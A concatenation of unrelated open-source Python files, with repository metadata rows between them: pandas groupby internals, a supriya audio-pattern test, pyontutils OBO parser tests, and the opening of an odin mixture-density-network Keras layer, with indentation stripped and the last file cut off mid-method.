return self.grouper._cython_operation(
"transform", bvalues, how, 1, **kwargs
)
# We could use `mgr.apply` here and not have to set_axis, but
# we would have to do shape gymnastics for ArrayManager compat
res_mgr = mgr.grouped_reduce(arr_func, ignore_failures=True)
res_mgr.set_axis(1, mgr.axes[1])
if len(res_mgr) < len(mgr):
warnings.warn(
f"Dropping invalid columns in {type(self).__name__}.{how} "
"is deprecated. In a future version, a TypeError will be raised. "
f"Before calling .{how}, select only columns which should be "
"valid for the transforming function.",
FutureWarning,
stacklevel=4,
)
res_df = self.obj._constructor(res_mgr)
if self.axis == 1:
res_df = res_df.T
return res_df
def _transform_general(self, func, *args, **kwargs):
from pandas.core.reshape.concat import concat
applied = []
obj = self._obj_with_exclusions
gen = self.grouper.get_iterator(obj, axis=self.axis)
fast_path, slow_path = self._define_paths(func, *args, **kwargs)
for name, group in gen:
object.__setattr__(group, "name", name)
# Try slow path and fast path.
try:
path, res = self._choose_path(fast_path, slow_path, group)
except TypeError:
return self._transform_item_by_item(obj, fast_path)
except ValueError as err:
msg = "transform must return a scalar value for each group"
raise ValueError(msg) from err
if isinstance(res, Series):
# we need to broadcast across the
# other dimension; this will preserve dtypes
# GH14457
if not np.prod(group.shape):
continue
elif res.index.is_(obj.index):
r = concat([res] * len(group.columns), axis=1)
r.columns = group.columns
r.index = group.index
else:
r = self.obj._constructor(
np.concatenate([res.values] * len(group.index)).reshape(
group.shape
),
columns=group.columns,
index=group.index,
)
applied.append(r)
else:
applied.append(res)
concat_index = obj.columns if self.axis == 0 else obj.index
other_axis = 1 if self.axis == 0 else 0 # switches between 0 & 1
concatenated = concat(applied, axis=self.axis, verify_integrity=False)
concatenated = concatenated.reindex(concat_index, axis=other_axis, copy=False)
return self._set_result_index_ordered(concatenated)
@Substitution(klass="DataFrame")
@Appender(_transform_template)
def transform(self, func, *args, engine=None, engine_kwargs=None, **kwargs):
return self._transform(
func, *args, engine=engine, engine_kwargs=engine_kwargs, **kwargs
)
def _can_use_transform_fast(self, result) -> bool:
return isinstance(result, DataFrame) and result.columns.equals(
self._obj_with_exclusions.columns
)
def _wrap_transform_fast_result(self, result: DataFrame) -> DataFrame:
"""
Fast transform path for aggregations
"""
obj = self._obj_with_exclusions
# for each col, reshape to size of original frame by take operation
ids, _, _ = self.grouper.group_info
result = result.reindex(self.grouper.result_index, copy=False)
output = result.take(ids, axis=0)
output.index = obj.index
return output
def _define_paths(self, func, *args, **kwargs):
if isinstance(func, str):
fast_path = lambda group: getattr(group, func)(*args, **kwargs)
slow_path = lambda group: group.apply(
lambda x: getattr(x, func)(*args, **kwargs), axis=self.axis
)
else:
fast_path = lambda group: func(group, *args, **kwargs)
slow_path = lambda group: group.apply(
lambda x: func(x, *args, **kwargs), axis=self.axis
)
return fast_path, slow_path
def _choose_path(self, fast_path: Callable, slow_path: Callable, group: DataFrame):
path = slow_path
res = slow_path(group)
# if we make it here, test if we can use the fast path
try:
res_fast = fast_path(group)
except AssertionError:
raise # pragma: no cover
except Exception:
# GH#29631 For user-defined function, we can't predict what may be
# raised; see test_transform.test_transform_fastpath_raises
return path, res
# verify fast path does not change columns (and names), otherwise
# its results cannot be joined with those of the slow path
if not isinstance(res_fast, DataFrame):
return path, res
if not res_fast.columns.equals(group.columns):
return path, res
if res_fast.equals(res):
path = fast_path
return path, res
def _transform_item_by_item(self, obj: DataFrame, wrapper) -> DataFrame:
# iterate through columns, see test_transform_exclude_nuisance
# gets here with non-unique columns
output = {}
inds = []
for i, col in enumerate(obj):
subset = obj.iloc[:, i]
sgb = SeriesGroupBy(
subset,
selection=col,
grouper=self.grouper,
exclusions=self.exclusions,
)
try:
output[i] = sgb.transform(wrapper)
except TypeError:
# e.g. trying to call nanmean with string values
warnings.warn(
f"Dropping invalid columns in {type(self).__name__}.transform "
"is deprecated. In a future version, a TypeError will be raised. "
"Before calling .transform, select only columns which should be "
"valid for the transforming function.",
FutureWarning,
stacklevel=5,
)
else:
inds.append(i)
if not output:
raise TypeError("Transform function invalid for data types")
columns = obj.columns.take(inds)
result = self.obj._constructor(output, index=obj.index)
result.columns = columns
return result
def filter(self, func, dropna=True, *args, **kwargs):
"""
Return a copy of a DataFrame excluding filtered elements.
Elements from groups are filtered if they do not satisfy the
boolean criterion specified by func.
Parameters
----------
func : function
Function to apply to each subframe. Should return True or False.
dropna : Drop groups that do not pass the filter. True by default;
If False, groups that evaluate False are filled with NaNs.
Returns
-------
filtered : DataFrame
Notes
-----
Each subframe is endowed the attribute 'name' in case you need to know
which group you are working on.
Functions that mutate the passed object can produce unexpected
behavior or errors and are not supported. See :ref:`gotchas.udf-mutation`
for more details.
Examples
--------
>>> df = pd.DataFrame({'A' : ['foo', 'bar', 'foo', 'bar',
... 'foo', 'bar'],
... 'B' : [1, 2, 3, 4, 5, 6],
... 'C' : [2.0, 5., 8., 1., 2., 9.]})
>>> grouped = df.groupby('A')
>>> grouped.filter(lambda x: x['B'].mean() > 3.)
A B C
1 bar 2 5.0
3 bar 4 1.0
5 bar 6 9.0
"""
indices = []
obj = self._selected_obj
gen = self.grouper.get_iterator(obj, axis=self.axis)
for name, group in gen:
object.__setattr__(group, "name", name)
res = func(group, *args, **kwargs)
try:
res = res.squeeze()
except AttributeError: # allow e.g., scalars and frames to pass
pass
# interpret the result of the filter
if is_bool(res) or (is_scalar(res) and isna(res)):
if res and notna(res):
indices.append(self._get_index(name))
else:
# non scalars aren't allowed
raise TypeError(
f"filter function returned a {type(res).__name__}, "
"but expected a scalar bool"
)
return self._apply_filter(indices, dropna)
def __getitem__(self, key) -> DataFrameGroupBy | SeriesGroupBy:
if self.axis == 1:
# GH 37725
raise ValueError("Cannot subset columns when using axis=1")
# per GH 23566
if isinstance(key, tuple) and len(key) > 1:
# if len == 1, then it becomes a SeriesGroupBy and this is actually
# valid syntax, so don't raise warning
warnings.warn(
"Indexing with multiple keys (implicitly converted to a tuple "
"of keys) will be deprecated, use a list instead.",
FutureWarning,
stacklevel=2,
)
return super().__getitem__(key)
def _gotitem(self, key, ndim: int, subset=None):
"""
sub-classes to define
return a sliced object
Parameters
----------
key : string / list of selections
ndim : {1, 2}
requested ndim of result
subset : object, default None
subset to act on
"""
if ndim == 2:
if subset is None:
subset = self.obj
return DataFrameGroupBy(
subset,
self.grouper,
axis=self.axis,
level=self.level,
grouper=self.grouper,
exclusions=self.exclusions,
selection=key,
as_index=self.as_index,
sort=self.sort,
group_keys=self.group_keys,
squeeze=self.squeeze,
observed=self.observed,
mutated=self.mutated,
dropna=self.dropna,
)
elif ndim == 1:
if subset is None:
subset = self.obj[key]
return SeriesGroupBy(
subset,
level=self.level,
grouper=self.grouper,
selection=key,
sort=self.sort,
group_keys=self.group_keys,
squeeze=self.squeeze,
observed=self.observed,
dropna=self.dropna,
)
raise AssertionError("invalid ndim for _gotitem")
def _get_data_to_aggregate(self) -> Manager2D:
obj = self._obj_with_exclusions
if self.axis == 1:
return obj.T._mgr
else:
return obj._mgr
def _insert_inaxis_grouper_inplace(self, result: DataFrame) -> None:
# zip in reverse so we can always insert at loc 0
columns = result.columns
for name, lev, in_axis in zip(
reversed(self.grouper.names),
reversed(self.grouper.get_group_levels()),
reversed([grp.in_axis for grp in self.grouper.groupings]),
):
# GH #28549
# When using .apply(-), name will be in columns already
if in_axis and name not in columns:
result.insert(0, name, lev)
def _wrap_aggregated_output(
self,
output: Mapping[base.OutputKey, Series | ArrayLike],
) -> DataFrame:
"""
Wraps the output of DataFrameGroupBy aggregations into the expected result.
Parameters
----------
output : Mapping[base.OutputKey, Union[Series, np.ndarray]]
Data to wrap.
Returns
-------
DataFrame
"""
indexed_output = {key.position: val for key, val in output.items()}
columns = Index([key.label for key in output])
columns._set_names(self._obj_with_exclusions._get_axis(1 - self.axis).names)
result = self.obj._constructor(indexed_output)
result.columns = columns
if not self.as_index:
self._insert_inaxis_grouper_inplace(result)
result = result._consolidate()
else:
result.index = self.grouper.result_index
if self.axis == 1:
result = result.T
if result.index.equals(self.obj.index):
# Retain e.g. DatetimeIndex/TimedeltaIndex freq
result.index = self.obj.index.copy()
# TODO: Do this more systematically
return self._reindex_output(result)
def _wrap_transformed_output(
self, output: Mapping[base.OutputKey, Series | ArrayLike]
) -> DataFrame:
"""
Wraps the output of DataFrameGroupBy transformations into the expected result.
Parameters
----------
output : Mapping[base.OutputKey, Union[Series, np.ndarray, ExtensionArray]]
Data to wrap.
Returns
-------
DataFrame
"""
indexed_output = {key.position: val for key, val in output.items()}
result = self.obj._constructor(indexed_output)
if self.axis == 1:
result = result.T
result.columns = self.obj.columns
else:
columns = Index(key.label for key in output)
columns.name = self.obj.columns.name
result.columns = columns
result.index = self.obj.index
return result
def _wrap_agged_manager(self, mgr: Manager2D) -> DataFrame:
if not self.as_index:
index = Index(range(mgr.shape[1]))
mgr.set_axis(1, index)
result = self.obj._constructor(mgr)
self._insert_inaxis_grouper_inplace(result)
result = result._consolidate()
else:
index = self.grouper.result_index
mgr.set_axis(1, index)
result = self.obj._constructor(mgr)
if self.axis == 1:
result = result.T
return self._reindex_output(result)._convert(datetime=True)
def _iterate_column_groupbys(self, obj: FrameOrSeries):
for i, colname in enumerate(obj.columns):
yield colname, SeriesGroupBy(
obj.iloc[:, i],
selection=colname,
grouper=self.grouper,
exclusions=self.exclusions,
)
def _apply_to_column_groupbys(self, func, obj: FrameOrSeries) -> DataFrame:
from pandas.core.reshape.concat import concat
columns = obj.columns
results = [
func(col_groupby) for _, col_groupby in self._iterate_column_groupbys(obj)
]
if not len(results):
# concat would raise
return DataFrame([], columns=columns, index=self.grouper.result_index)
else:
return concat(results, keys=columns, axis=1)
def count(self) -> DataFrame:
"""
Compute count of group, excluding missing values.
Returns
-------
DataFrame
Count of values within each group.
"""
data = self._get_data_to_aggregate()
ids, _, ngroups = self.grouper.group_info
mask = ids != -1
def hfunc(bvalues: ArrayLike) -> ArrayLike:
# TODO(2DEA): reshape would not be necessary with 2D EAs
if bvalues.ndim == 1:
# EA
masked = mask & ~isna(bvalues).reshape(1, -1)
else:
masked = mask & ~isna(bvalues)
counted = lib.count_level_2d(masked, labels=ids, max_bin=ngroups, axis=1)
return counted
new_mgr = data.grouped_reduce(hfunc)
# If we are grouping on categoricals we want unobserved categories to
# return zero, rather than the default of NaN which the reindexing in
# _wrap_agged_manager() returns. GH 35028
with com.temp_setattr(self, "observed", True):
result = self._wrap_agged_manager(new_mgr)
return self._reindex_output(result, fill_value=0)
def nunique(self, dropna: bool = True) -> DataFrame:
"""
Return DataFrame with counts of unique elements in each position.
Parameters
----------
dropna : bool, default True
Don't include NaN in the counts.
Returns
-------
nunique: DataFrame
Examples
--------
>>> df = pd.DataFrame({'id': ['spam', 'egg', 'egg', 'spam',
... 'ham', 'ham'],
... 'value1': [1, 5, 5, 2, 5, 5],
... 'value2': list('abbaxy')})
>>> df
id value1 value2
0 spam 1 a
1 egg 5 b
2 egg 5 b
3 spam 2 a
4 ham 5 x
5 ham 5 y
>>> df.groupby('id').nunique()
value1 value2
id
egg 1 1
ham 1 2
spam 2 1
Check for rows with the same id but conflicting values:
>>> df.groupby('id').filter(lambda g: (g.nunique() > 1).any())
id value1 value2
0 spam 1 a
3 spam 2 a
4 ham 5 x
5 ham 5 y
"""
if self.axis != 0:
# see test_groupby_crash_on_nunique
return self._python_agg_general(lambda sgb: sgb.nunique(dropna))
obj = self._obj_with_exclusions
results = self._apply_to_column_groupbys(
lambda sgb: sgb.nunique(dropna), obj=obj
)
results.columns.names = obj.columns.names # TODO: do at higher level?
if not self.as_index:
results.index = Index(range(len(results)))
self._insert_inaxis_grouper_inplace(results)
return results
@Appender(DataFrame.idxmax.__doc__)
def idxmax(self, axis=0, skipna: bool = True):
axis = DataFrame._get_axis_number(axis)
numeric_only = None if axis == 0 else False
def func(df):
# NB: here we use numeric_only=None, in DataFrame it is False GH#38217
res = df._reduce(
nanops.nanargmax,
"argmax",
axis=axis,
skipna=skipna,
numeric_only=numeric_only,
)
indices = res._values
index = df._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return df._constructor_sliced(result, index=res.index)
return self._python_apply_general(func, self._obj_with_exclusions)
@Appender(DataFrame.idxmin.__doc__)
def idxmin(self, axis=0, skipna: bool = True):
axis = DataFrame._get_axis_number(axis)
numeric_only = None if axis == 0 else False
def func(df):
# NB: here we use numeric_only=None, in DataFrame it is False GH#38217
res = df._reduce(
nanops.nanargmin,
"argmin",
axis=axis,
skipna=skipna,
numeric_only=numeric_only,
)
indices = res._values
index = df._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return df._constructor_sliced(result, index=res.index)
return self._python_apply_general(func, self._obj_with_exclusions)
boxplot = boxplot_frame_groupby
| bsd-3-clause | -8,992,444,320,100,172,000 | 32.947425 | 88 | 0.548184 | false |
Pulgama/supriya | tests/test_patterns_Pgpar_Pfx_Pgroup.py | 1 | 11524 | import pytest
import uqbar.strings
import supriya.assets.synthdefs
import supriya.nonrealtime
import supriya.patterns
import supriya.synthdefs
import supriya.ugens
with supriya.synthdefs.SynthDefBuilder(in_=0, out=0) as builder:
source = supriya.ugens.In.ar(bus=builder["in_"])
source = supriya.ugens.Limiter.ar(source=source)
supriya.ugens.Out.ar(bus=builder["out"], source=source)
limiter_synthdef = builder.build()
pattern_one = supriya.patterns.Ppar(
[
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([1111, 1112, 1113], 1)
),
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([2221, 2222, 2223], 1)
),
]
)
pattern_one = pattern_one.with_group()
pattern_one = pattern_one.with_effect(synthdef=limiter_synthdef)
pattern_two = supriya.patterns.Ppar(
[
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([3331, 3332, 3333], 1)
),
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([4441, 4442, 4443], 1)
),
]
)
pattern_two = pattern_two.with_group()
pattern_two = pattern_two.with_effect(synthdef=limiter_synthdef)
pattern = supriya.patterns.Pgpar([pattern_one, pattern_two])
pattern = pattern.with_bus()
def test_nonrealtime():
session = supriya.nonrealtime.Session()
with session.at(0):
final_offset = session.inscribe(pattern)
d_recv_commands = pytest.helpers.build_d_recv_commands(
[
supriya.assets.synthdefs.system_link_audio_2,
supriya.assets.synthdefs.default,
limiter_synthdef,
]
)
assert session.to_lists() == [
[
0.0,
[
*d_recv_commands,
["/g_new", 1000, 0, 0],
[
"/s_new",
"38a2c79fc9d58d06e361337163a4e80f",
1001,
3,
1000,
"fade_time",
0.25,
"in_",
16,
],
["/g_new", 1002, 1, 1000],
["/g_new", 1003, 1, 1000],
[
"/s_new",
"38bda0aee6d0e2d4af72be83c09d9b77",
1004,
1,
1002,
"in_",
16,
"out",
16,
],
["/g_new", 1005, 0, 1002],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1006,
0,
1005,
"frequency",
1111,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1007,
0,
1005,
"frequency",
2221,
"out",
16,
],
[
"/s_new",
"38bda0aee6d0e2d4af72be83c09d9b77",
1008,
1,
1003,
"in_",
16,
"out",
16,
],
["/g_new", 1009, 0, 1003],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1010,
0,
1009,
"frequency",
3331,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1011,
0,
1009,
"frequency",
4441,
"out",
16,
],
],
],
[
1.0,
[
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1012,
0,
1005,
"frequency",
1112,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1013,
0,
1005,
"frequency",
2222,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1014,
0,
1009,
"frequency",
3332,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1015,
0,
1009,
"frequency",
4442,
"out",
16,
],
["/n_set", 1006, "gate", 0],
["/n_set", 1007, "gate", 0],
["/n_set", 1010, "gate", 0],
["/n_set", 1011, "gate", 0],
],
],
[
2.0,
[
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1016,
0,
1005,
"frequency",
1113,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1017,
0,
1005,
"frequency",
2223,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1018,
0,
1009,
"frequency",
3333,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1019,
0,
1009,
"frequency",
4443,
"out",
16,
],
["/n_set", 1012, "gate", 0],
["/n_set", 1013, "gate", 0],
["/n_set", 1014, "gate", 0],
["/n_set", 1015, "gate", 0],
],
],
[
3.0,
[
["/n_set", 1001, "gate", 0],
["/n_set", 1016, "gate", 0],
["/n_set", 1017, "gate", 0],
["/n_set", 1018, "gate", 0],
["/n_set", 1019, "gate", 0],
],
],
[3.25, [["/n_free", 1000, 1002, 1003, 1004, 1005, 1008, 1009], [0]]],
]
assert final_offset == 3.25
def test_to_strings():
session = supriya.nonrealtime.Session()
with session.at(0):
session.inscribe(pattern)
assert session.to_strings(include_controls=True) == uqbar.strings.normalize(
"""
0.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1007 default
amplitude: 0.1, frequency: 2221.0, gate: 1.0, out: a0, pan: 0.5
1006 default
amplitude: 0.1, frequency: 1111.0, gate: 1.0, out: a0, pan: 0.5
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: a0, out: a0
1003 group
1009 group
1011 default
amplitude: 0.1, frequency: 4441.0, gate: 1.0, out: a0, pan: 0.5
1010 default
amplitude: 0.1, frequency: 3331.0, gate: 1.0, out: a0, pan: 0.5
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: a0, out: a0
1001 system_link_audio_2
done_action: 2.0, fade_time: 0.25, gate: 1.0, in_: a0, out: 0.0
1.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1013 default
amplitude: 0.1, frequency: 2222.0, gate: 1.0, out: a0, pan: 0.5
1012 default
amplitude: 0.1, frequency: 1112.0, gate: 1.0, out: a0, pan: 0.5
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1003 group
1009 group
1015 default
amplitude: 0.1, frequency: 4442.0, gate: 1.0, out: a0, pan: 0.5
1014 default
amplitude: 0.1, frequency: 3332.0, gate: 1.0, out: a0, pan: 0.5
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1001 system_link_audio_2
done_action: 2.0, fade_time: 0.02, gate: 1.0, in_: 16.0, out: 0.0
2.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1017 default
amplitude: 0.1, frequency: 2223.0, gate: 1.0, out: a0, pan: 0.5
1016 default
amplitude: 0.1, frequency: 1113.0, gate: 1.0, out: a0, pan: 0.5
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1003 group
1009 group
1019 default
amplitude: 0.1, frequency: 4443.0, gate: 1.0, out: a0, pan: 0.5
1018 default
amplitude: 0.1, frequency: 3333.0, gate: 1.0, out: a0, pan: 0.5
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1001 system_link_audio_2
done_action: 2.0, fade_time: 0.02, gate: 1.0, in_: 16.0, out: 0.0
3.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1003 group
1009 group
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
3.25:
NODE TREE 0 group
"""
)
| mit | -7,873,358,582,196,026,000 | 31.645892 | 95 | 0.342676 | false |
tgbugs/pyontutils | test/test_oboio.py | 1 | 6002 | import os
import shutil
import unittest
import pytest
from pyontutils import obo_io as oio
from .common import temp_path
obo_test_string = """format-version: 1.2
ontology: uberon/core
subsetdef: cumbo "CUMBO"
treat-xrefs-as-has-subclass: EV
import: http://purl.obolibrary.org/obo/uberon/chebi_import.owl
treat-xrefs-as-reverse-genus-differentia: TGMA part_of NCBITaxon:44484
[Term]
id: UBERON:0000003
xref: SCTID:272650008
relationship: in_lateral_side_of UBERON:0000033 {gci_relation="part_of", gci_filler="NCBITaxon:7776", notes="hagfish have median nostril"} ! head
!relationship: in_lateral_side_of UBERON:0000034 {gci_filler="NCBITaxon:7776", gci_relation="part_of", notes="hagfish have median nostril"} ! can't use this due to robot non-determinism
comment: robot does reorder the gci_ so that relation always comes before filler
property_value: external_definition "One of paired external openings of the nasal chamber.[AAO]" xsd:string {date_retrieved="2012-06-20", external_class="AAO:0000311", ontology="AAO", source="AAO:EJS"}
replaced_by: GO:0045202
consider: FMA:67408
[Term]
id: UBERON:0000033
name: head
comment: needed to prevent robot from throwing a null pointer on the relationship axiom above
[Term]
id: UBERON:0000034
[Typedef]
id: in_lateral_side_of
property_value: seeAlso FMA:86003
name: in_lateral_side_of
comment: id needed to prevent robot from throwing a null pointer on the relationship axiom above
comment: apparently also have to have name strangely enough and robot doesn't roundtrip random comments
is_transitive: true
"""
class TMHelper:
parse = oio.TVPair._parse_modifiers
serialize = oio.TVPair._format_trailing_modifiers
class TestOboIo(unittest.TestCase):
@classmethod
def setUpClass(cls):
if temp_path.exists():
shutil.rmtree(temp_path)
temp_path.mkdir()
@classmethod
def tearDownClass(cls):
shutil.rmtree(temp_path)
def test_parse_trailing_modifiers(self):
thm = TMHelper()
lines = (
(('relationship: part_of UBERON:0000949 '
'{source="AAO", source="FMA", source="XAO"} ! endocrine system'),
(('source', 'AAO'), ('source', 'FMA'), ('source', 'XAO'))),
('{oh="look", a="thing!"}', (('oh', 'look'), ('a', 'thing!'))),
('some randome values {oh="look", a="thing!"} ! yay!', (('oh', 'look'), ('a', 'thing!'))),
('some rando}me values {oh="l{ook", a="t{hing!"} ! yay!', (('oh', 'l{ook'), ('a', 't{hing!'))),
('some rando}me values {oh="l{ook", a="t}hing!"} ! yay!', (('oh', 'l{ook'), ('a', 't}hing!'))),
)
bads = [(expect, actual) for line, expect in lines
for _, actual in (thm.parse(line),)
if actual != expect]
assert not bads, '\n' + '\n\n'.join(f'{e}\n{a}' for e, a in bads)
def test_construct_simple_file(self):
of = oio.OboFile()
ids_names = [['123', 'test'],
['234', 'yee'],
['345', 'haw'],
['456', 'oio']]
terms = [oio.Term(id=i, name=n) for i, n in ids_names]
of.add(*terms)
str(of)
def test_header_treat_xrefs(self):
of = oio.OboFile()
test_tag = 'treat-xrefs-as-is_a'
tags_values = [
[test_tag, 'TEMP:test1'],
[test_tag, 'TEMP:test2'],
]
tvpairs = [oio.TVPair(tag=t, value=v) for t, v in tags_values]
of.header.add(*tvpairs)
tv = of.asObo()
assert len(tv.split(test_tag)) > 2, tv
def test_property_value_bug(self):
def _test(string):
pv = oio.Property_value.parse(string)
assert pv.value() == string
tv = oio.TVPair(string)
assert str(tv) == string
return pv, tv
minimal = ('property_value: any " ! " xsd:string')
pv, tv = _test(minimal)
darn = ('property_value: external_ontology_notes "see also MA:0002165 !'
' lieno-pancreatic vein" xsd:string {external_ontology="MA"}')
pv, tv = _test(darn)
ouch = ('property_value: editor_note "TODO -'
' this string breaks the parser A:0 ! wat" xsd:string')
pv, tv = _test(ouch)
hrm = ('property_value: editor_note "TODO -'
' consider relationship to UBERON:0000091 ! bilaminar disc" xsd:string')
pv, tv = _test(hrm)
def test_robot(self):
of1 = oio.OboFile(data=obo_test_string)
obo1 = of1.asObo(stamp=False)
obor1 = of1.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
of2 = oio.OboFile(data=obo1)
obo2 = of2.asObo(stamp=False)
# can't test against obor2 because obo1 reordered the trailing qualifiers
# and since there is seemingly no rational way to predict those, we simply
# preserve the ordering that we got
obor2 = of2.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
of3 = oio.OboFile(data=obor1)
obo3 = of3.asObo(stamp=False)
obor3 = of3.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
print(obo1)
print(obo2)
print(obor1)
print(obor2)
assert obo1 == obo2 == obo3 != obor1
assert obor1 == obor3
@pytest.mark.skipif(not shutil.which('robot'), reason='robot not installed')
def test_robot_rt(self):
of = oio.OboFile(data=obo_test_string)
obor1 = of.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
rtp = temp_path / 'robot-test.obo'
robot_path = temp_path / 'robot-test.test.obo'
of.write(rtp, stamp=False, version=oio.OBO_VER_ROBOT)
cmd = f'robot convert -vvv -i {rtp.as_posix()} -o {robot_path.as_posix()}'
wat = os.system(cmd)
if wat:
raise ValueError(wat)
datas = []
for path in (rtp, robot_path):
with open(path, 'rt') as f:
datas.append(f.read())
ours, rob = datas
assert ours == rob
| mit | -6,232,890,414,575,821,000 | 34.72619 | 201 | 0.598967 | false |
imito/odin | odin/networks/mixture_density_network.py | 1 | 10035 | from __future__ import absolute_import, division, print_function
import collections
import numpy as np
import tensorflow as tf
from sklearn.mixture import GaussianMixture
from tensorflow.python import keras
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras.layers import Dense
from tensorflow_probability.python import bijectors as tfb
from tensorflow_probability.python import distributions as tfd
from tensorflow_probability.python.layers.distribution_layer import (
DistributionLambda, _get_convert_to_tensor_fn, _serialize,
_serialize_function)
from tensorflow_probability.python.layers.internal import \
distribution_tensor_coercible as dtc
from tensorflow_probability.python.layers.internal import \
tensor_tuple as tensor_tuple
__all__ = ['MixtureDensityNetwork']
_COV_TYPES = ('none', 'diag', 'full', 'tril')
class MixtureDensityNetwork(Dense):
"""A mixture of Gaussian Keras layer.
Parameters
----------
units : `int`
number of output features for each component.
n_components : `int` (default=`2`)
The number of mixture components.
covariance_type : {'none', 'diag', 'full', 'tril'}
String describing the type of covariance parameters to use.
Must be one of:
'none' (each component has its own single variance).
'diag' (each component has its own diagonal covariance matrix),
'tril' (lower triangle matrix),
'full' (each component has its own general covariance matrix),
"""
def __init__(self,
units,
n_components=2,
covariance_type='none',
convert_to_tensor_fn=tfd.Distribution.sample,
softplus_scale=True,
validate_args=False,
activation='linear',
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
covariance_type = str(covariance_type).lower()
assert covariance_type in _COV_TYPES, \
"No support for covariance_type: '%s', the support value are: %s" % \
(covariance_type, ', '.join(_COV_TYPES))
self._covariance_type = covariance_type
self._n_components = int(n_components)
self._validate_args = bool(validate_args)
self._convert_to_tensor_fn = _get_convert_to_tensor_fn(convert_to_tensor_fn)
self._softplus_scale = bool(softplus_scale)
# We'll need to keep track of who's calling who since the functional
# API has a different way of injecting `_keras_history` than the
# `keras.Sequential` way.
self._enter_dunder_call = False
# ====== calculating the number of parameters ====== #
if covariance_type == 'none':
component_params_size = 2 * units
elif covariance_type == 'diag': # only the diagonal
component_params_size = units + units
elif covariance_type == 'tril': # lower triangle
component_params_size = units + units * (units + 1) // 2
elif covariance_type == 'full': # full matrix
component_params_size = units + units * units
else:
raise NotImplementedError
self._component_params_size = component_params_size
params_size = self.n_components + self.n_components * component_params_size
self._event_size = units
super(MixtureDensityNetwork,
self).__init__(units=params_size,
activation=activation,
use_bias=use_bias,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
activity_regularizer=activity_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint,
**kwargs)
@property
def event_size(self):
return self._event_size
@property
def covariance_type(self):
return self._covariance_type
@property
def n_components(self):
return self._n_components
@property
def component_params_size(self):
return self._component_params_size
def __call__(self, inputs, *args, **kwargs):
self._enter_dunder_call = True
distribution, _ = super(MixtureDensityNetwork,
self).__call__(inputs, *args, **kwargs)
self._enter_dunder_call = False
return distribution
def call(self, inputs, *args, **kwargs):
dense_kwargs = dict(kwargs)
dense_kwargs.pop('training', None)
params = super(MixtureDensityNetwork, self).call(inputs, *args,
**dense_kwargs)
n_components = tf.convert_to_tensor(value=self.n_components,
name='n_components',
dtype_hint=tf.int32)
# ====== mixture weights ====== #
mixture_coefficients = params[..., :n_components]
mixture_dist = tfd.Categorical(logits=mixture_coefficients,
validate_args=self._validate_args,
name="MixtureWeights")
# ====== initialize the components ====== #
params = tf.reshape(
params[..., n_components:],
tf.concat([tf.shape(input=params)[:-1], [n_components, -1]], axis=0))
if bool(self._softplus_scale):
scale_fn = lambda x: tf.math.softplus(x) + tfd.softplus_inverse(1.0)
else:
scale_fn = lambda x: x
if self.covariance_type == 'none':
cov = 'IndependentNormal'
loc_params, scale_params = tf.split(params, 2, axis=-1)
scale_params = scale_params
components_dist = tfd.Independent(tfd.Normal(
loc=loc_params,
scale=scale_fn(scale_params),
validate_args=self._validate_args),
reinterpreted_batch_ndims=1)
#
elif self.covariance_type == 'diag':
cov = 'MultivariateNormalDiag'
loc_params, scale_params = tf.split(params, 2, axis=-1)
components_dist = tfd.MultivariateNormalDiag(
loc=loc_params,
scale_diag=scale_fn(scale_params),
validate_args=self._validate_args)
#
elif self.covariance_type == 'tril':
cov = 'MultivariateNormalTriL'
loc_params = params[..., :self.event_size]
scale_params = scale_fn(params[..., self.event_size:])
scale_tril = tfb.ScaleTriL(diag_shift=np.array(
1e-5, params.dtype.as_numpy_dtype()),
validate_args=self._validate_args)
components_dist = tfd.MultivariateNormalTriL(
loc=loc_params,
scale_tril=scale_tril(scale_params),
validate_args=self._validate_args)
#
elif self.covariance_type == 'full':
